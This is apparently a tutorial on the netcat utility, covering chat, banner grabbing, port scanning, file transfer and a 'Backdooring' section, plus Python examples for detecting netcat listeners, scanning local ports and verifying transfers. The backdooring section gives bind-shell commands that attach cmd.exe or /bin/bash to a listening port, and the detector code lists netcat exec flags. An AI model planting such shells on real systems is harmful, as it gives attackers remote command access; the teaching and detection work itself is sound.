The Mighty Netcat

If you have any interest in playing around with networks, you have almost certainly heard of a utility called Netcat.

Netcat is a simple tool that reads and writes data across TCP or UDP network connections. It was released back in 1995 and has remained popular to this day. Despite its popularity it is no longer maintained; a different tool, ncat, has brought several serious improvements to it, but here we’ll just stick to good old netcat.

What can it be used for?

Messaging - using Netcat, an operator can redirect simple text between two computers in a simplistic chat.

File Transfer - Netcat allows you to transfer files between computers.

Banner Grabbing - Netcat allows an operator to establish a socket to a specific port to potentially identify the operating system, service, version, and other information necessary to audit the host.

Port Scanning - Netcat allows the operator to utilize a rudimentary port scanning function, whereby a port or series of ports can be scanned to determine if the port is open or closed.

Most Unix-based operating systems come with this utility pre-installed; however, you can also download and compile it yourself (http://netcat.sourceforge.net/). You can use it on Windows too.
Note that I have used netcat-traditional in this post, while Ubuntu ships with netcat-openbsd (which, among other differences, lacks the -e option used below); check out this Stack Overflow question on how to switch between them.

Sending Message

I will be using a virtual machine with BlackArch Linux on it, configured with bridged networking, to demonstrate this.

Launch a terminal (or command prompt on Windows). In this case the listener’s operating system is BlackArch.
Type in the following command:

nc -vlp 8080

This command opens a listener on port 8080.
Now, to connect, you need the IP address of the listener; in my case it’s 192.168.1.4.
Type the following command to connect to the listener:

nc 192.168.1.4 8080

Once connected, try sending a message from either of the connected machines; it might look something like this:
[screenshot: message]

Banner Grabbing

We can use netcat to grab information about the services running on specific ports of a host. To grab a banner, fire up a terminal and issue this command, in this case to grab the banner of a web server:

nc 192.168.1.2 80

To send an HTTP GET request, type the request line and then press Enter twice (the empty line tells the server the request is complete):

GET / HTTP/1.0
[enter]
[enter]

You might get something like this:

HTTP/1.0 200 OK
Date: Mon, 02 Feb 2015 07:29:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

To grab the banner of another port/service, use

nc -v -n <ip> <port>

I used this command to grab the banner of my local SSH server and it gave the following output:

[email protected]:~$ nc -v -n 127.0.0.1 22
(UNKNOWN) [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3.1.IS.10.04

Backdooring

Interestingly, netcat can also be used for backdooring. There are many reverse shell scripts that can be bound to a port so that an attacker can connect to it later, but here we’ll use netcat for both listening and connecting.

If the target is Windows you can use

nc -vlp 8080 -e cmd.exe

It will execute cmd.exe when another machine connects to it.

and if it’s Unix/Unix-like you can use

nc -vlp 8080 -e /bin/bash

To connect, simply use netcat to connect to port 8080, as in this case:

nc <ip> 8080

and after that we can simply execute system commands through netcat.

[screenshot: backdoor]
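From the defender’s side, the pattern above (a netcat listener started with -e) is easy to spot in a process listing. The following is an added example, not code from the original post: it classifies netcat-family command lines (nc, netcat, ncat) by whether they listen and whether they hand the connection to a program, then runs that over a ps-style listing. The sample process lines, the verdict names and the function names are constructed for the example.

```python
import shlex

# Binaries that behave like the netcat family (base names, not paths).
NETCAT_NAMES = {"nc", "netcat", "nc.traditional", "nc.openbsd", "ncat"}
# Flags that make netcat hand the connection to a program: -e in
# netcat-traditional and ncat, -c/--sh-exec/--exec in ncat.
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
LISTEN_FLAGS = {"-l", "--listen"}


def classify(cmdline: str):
    """Return 'backdoor', 'listener' or 'client' for a netcat command line,
    or None if the command is not netcat at all."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                     # unbalanced quotes etc.
        return None
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1].lower()
    if prog.endswith(".exe"):              # Windows builds: nc.exe
        prog = prog[:-4]
    if prog not in NETCAT_NAMES:
        return None

    flags = set()
    for arg in argv[1:]:
        if arg.startswith("--"):
            flags.add(arg.split("=", 1)[0])                 # --exec=/bin/sh -> --exec
        elif arg.startswith("-") and len(arg) > 1:
            flags.update("-" + ch for ch in arg[1:])        # -vlp -> -v -l -p
    if flags & EXEC_FLAGS:
        return "backdoor"      # a program is spawned for whoever connects
    if flags & LISTEN_FLAGS:
        return "listener"      # waiting for connections, but no -e
    return "client"


# Constructed sample in `ps -eo pid,user,args` layout (not real output).
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1337 www-data nc -vlp 8080 -e /bin/bash
 1400 alice    nc -v -n 127.0.0.1 22
 1501 bob      /bin/nc.traditional -l -p 9000
 1600 root     /usr/bin/python3 -m http.server
 1701 svc      ncat --exec=/bin/sh -l 4444
"""


def find_netcat_processes(ps_output: str):
    """Parse ps-style output and return (pid, user, verdict) for every
    netcat-family process, most alarming first."""
    rank = {"backdoor": 0, "listener": 1, "client": 2}
    findings = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        verdict = classify(cmd)
        if verdict:
            findings.append((int(pid), user, verdict))
    return sorted(findings, key=lambda f: (rank[f[2]], f[0]))


if __name__ == "__main__":
    for pid, user, verdict in find_netcat_processes(SAMPLE_PS):
        print(f"{verdict:9} pid={pid} user={user}")
```

On a real box, feed it the output of `ps -eo pid,user,args`; a "backdoor" verdict for a process you did not start deserves an immediate look at who owns it and what port it is bound to.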

Port Scanning

When most people talk of port scanners and port scanning capabilities, they generally don’t think of Netcat in the same vein as tools like Nmap, Angry IP Scanner, or Foundstone’s SuperScan. However, Netcat can perform basic port scanning and even offers the ability to obfuscate the source of the port scan.

To port scan, type this command in a terminal:

nc -v -w 1 <host> -z <port range>

For example, I performed this scan on my router and it gave:

nc -v -w 1 192.168.1.1 -z 1-100
ZXDSL [192.168.1.1] 80 (http) open
ZXDSL [192.168.1.1] 23 (telnet) open
ZXDSL [192.168.1.1] 22 (ssh) open
ZXDSL [192.168.1.1] 21 (ftp) open

The -v is for verbosity, which in our port scan makes Netcat print the open ports it finds. The -w 1 is a timeout: it tells Netcat how long to wait for a port to respond as open or closed before moving on (one second here). Next is the target we want to scan, which in this example is 192.168.1.1. The -z switch is new: it puts Netcat in zero-I/O mode, meaning it only attempts the connection and neither sends nor reads any data, which is what makes the scan fast. Finally, we specify the port range, which in this case is 1-100.
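To show what `nc -z` and a banner grab actually do on the wire, here is an added Python example (not code from the original post) that implements both: a zero-I/O connect scan that only tests whether connect() succeeds within the timeout, and a banner grab that can send a request first, which is why the HTTP case in the banner grabbing section needs the GET line while the SSH server speaks unprompted. It runs against two throwaway listeners on 127.0.0.1 whose banners are constructed for the example; `_fake_service`, `scan_ports`, `grab_banner` and `demo` are names chosen here.

```python
import socket
import threading


def _fake_service(banner: bytes, wait_for_request: bool = False) -> int:
    """Constructed stand-in for a network service: listens on an ephemeral
    127.0.0.1 port and sends `banner` to each client, either immediately
    (SSH style) or only after the client has sent something (HTTP style).
    Returns the port number it is listening on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.settimeout(2.0)
                try:
                    if wait_for_request:
                        conn.recv(4096)
                    conn.sendall(banner)
                except OSError:
                    pass               # client went away (e.g. a -z style probe)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def scan_ports(host: str, ports, timeout: float = 1.0) -> list:
    """Zero-I/O connect scan, the equivalent of `nc -z -w <timeout>`: a port
    counts as open when connect() succeeds within `timeout` seconds; no bytes
    are ever sent or read."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, request: bytes = b"", timeout: float = 2.0) -> bytes:
    """Connect and return the first bytes the service sends, the equivalent of
    `nc -v -n <ip> <port>`. Services such as HTTP say nothing until spoken to,
    so an optional `request` (the GET line for a web server) can be sent first.
    Returns b"" if nothing arrives before the timeout."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if request:
            s.sendall(request)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


def demo() -> dict:
    """Scan and banner-grab the constructed local services; returns the results
    so they can be checked rather than just printed."""
    ssh_port = _fake_service(b"SSH-2.0-OpenSSH_example\r\n")
    http_port = _fake_service(b"HTTP/1.0 200 OK\r\nServer: Apache/example\r\n\r\n",
                              wait_for_request=True)
    # Reserve and release a port so the scan also has a 'closed' result.
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()

    found = scan_ports("127.0.0.1", [ssh_port, http_port, closed_port])
    http_reply = grab_banner("127.0.0.1", http_port, request=b"GET / HTTP/1.0\r\n\r\n")
    return {
        "open": sorted(found),
        "expected_open": sorted([ssh_port, http_port]),
        "closed": closed_port,
        "ssh_banner": grab_banner("127.0.0.1", ssh_port),
        "http_status_line": http_reply.split(b"\r\n", 1)[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same connect-with-timeout loop is what makes a scan visible on the target: each probed port sees a full TCP handshake followed by an immediate close, which is the signature a host firewall log or IDS can count.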

Sending Files

Netcat can be used to send files between server and client without the hassle of setting up an FTP server, using just a couple of commands.

Start the listener with the following command; it writes whatever arrives on <port> into database.file in the directory the command was executed from (-l is required so that netcat listens instead of trying to connect, and -w 30 makes it give up after 30 seconds without data):

nc -v -l -w 30 -p <port> > database.file

and on the client side, to send the file (make sure database.file is in the directory from which the command is executed):

nc -v -w 2 <ip> <port> < database.file
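Netcat streams raw bytes and says nothing about whether the whole file arrived, so the check a practitioner wants is a hash comparison on both ends. The following is an added Python example, not code from the original post, that reproduces the two commands above (listener writes the stream to disk, client streams the file and half-closes to signal EOF) over 127.0.0.1 in a single process and returns the SHA-256 of what was sent and what was received; the file contents, the ephemeral port and the function names are constructed for the example.

```python
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 64 * 1024


def receive_file(server_sock: socket.socket, dest_path: str) -> str:
    """Listener side (`nc -l -p <port> > file`): accept one client and write
    the raw stream to dest_path until the sender closes. Returns the SHA-256
    of what was written."""
    conn, _ = server_sock.accept()
    digest = hashlib.sha256()
    with conn, open(dest_path, "wb") as out:
        conn.settimeout(30.0)            # like -w 30: give up on a silent peer
        while True:
            chunk = conn.recv(CHUNK)
            if not chunk:                # EOF: the sender is done
                break
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()


def send_file(host: str, port: int, src_path: str) -> str:
    """Client side (`nc <ip> <port> < file`): stream the file, then half-close
    so the receiver sees EOF. Returns the SHA-256 of what was sent."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port), timeout=5.0) as s, open(src_path, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                break
            s.sendall(chunk)
            digest.update(chunk)
        s.shutdown(socket.SHUT_WR)
    return digest.hexdigest()


def transfer(src_path: str, dest_path: str):
    """Run both ends over 127.0.0.1 and return (sent_sha256, received_sha256).
    If they differ, the copy is incomplete or corrupted."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))           # ephemeral port chosen by the OS
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}
    receiver = threading.Thread(
        target=lambda: result.__setitem__("received", receive_file(srv, dest_path)))
    receiver.start()
    result["sent"] = send_file("127.0.0.1", port, src_path)
    receiver.join()
    srv.close()
    return result["sent"], result["received"]


def demo():
    """Create a constructed database.file, transfer it, and verify the copy.
    Returns (hashes_match, bytes_received)."""
    payload = b"constructed sample database contents\n" * 2000   # 74000 bytes
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "database.file")
    dest = os.path.join(workdir, "database.file.received")
    with open(src, "wb") as f:
        f.write(payload)
    sent, received = transfer(src, dest)
    with open(dest, "rb") as f:
        copy = f.read()
    return sent == received and copy == payload, len(copy)


if __name__ == "__main__":
    ok, size = demo()
    print(f"{size} bytes received, integrity {'OK' if ok else 'FAILED'}")
```

With real netcat the equivalent check is `sha256sum database.file` on both machines after the transfer; the copy is complete only when the digests match, because the receiving nc exits on any EOF, including one caused by the sender being interrupted.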